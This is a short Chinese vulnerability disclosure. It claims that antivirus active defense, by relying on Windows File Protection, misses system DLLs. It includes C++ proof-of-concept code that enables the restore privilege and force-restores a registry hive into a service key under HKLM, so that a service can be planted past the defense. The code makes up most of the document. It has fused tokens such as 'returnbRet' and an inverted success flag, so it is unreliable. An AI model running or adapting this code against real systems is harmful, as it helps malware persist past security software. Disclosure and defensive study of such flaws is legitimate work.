杀毒软件在主动防御的时候过于依赖WFP,漏防了系统自身的文件,导致了恶意程序可能通过感染系统dll染过主动防御执行任意操作.
DllHijack POC代码:
BOOL EnableDebugPriv(LPCTSTR lpName)
{ BOOL bRet = FALSE; HANDLE hToken = NULL;
TOKEN_PRIVILEGES tp; LUID luid; do {
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
break; if(!LookupPrivilegeValue(NULL,lpName,&luid)) break;
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
} while(FALSE); if(hToken != NULL)
CloseHandle(hToken); returnbRet; }
BOOL RestoreReg(HKEY hKey,LPCWSTR lpSubKey,TCHAR szFilePath[MAX_PATH]) {
BOOL bRet = FALSE; HKEY hCur = NULL; do {
if(!EnableDebugPriv(SE_RESTORE_NAME)) break;
if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&
RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS) break;
if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)
bRet = TRUE; } while(FALSE); if(hCur)
RegCloseKey(hCur); returnbRet; }
BOOL CDllHijackApp::InitInstance() { CWinApp::InitInstance();
RestoreReg(HKEY_LOCAL_MACHINE,L"SYSTEM\\CurrentControlSet\\Services\\poc",L"C:\\poc.hiv");
returnTRUE; }
修复方案:
辅助WFP防护,校验文件
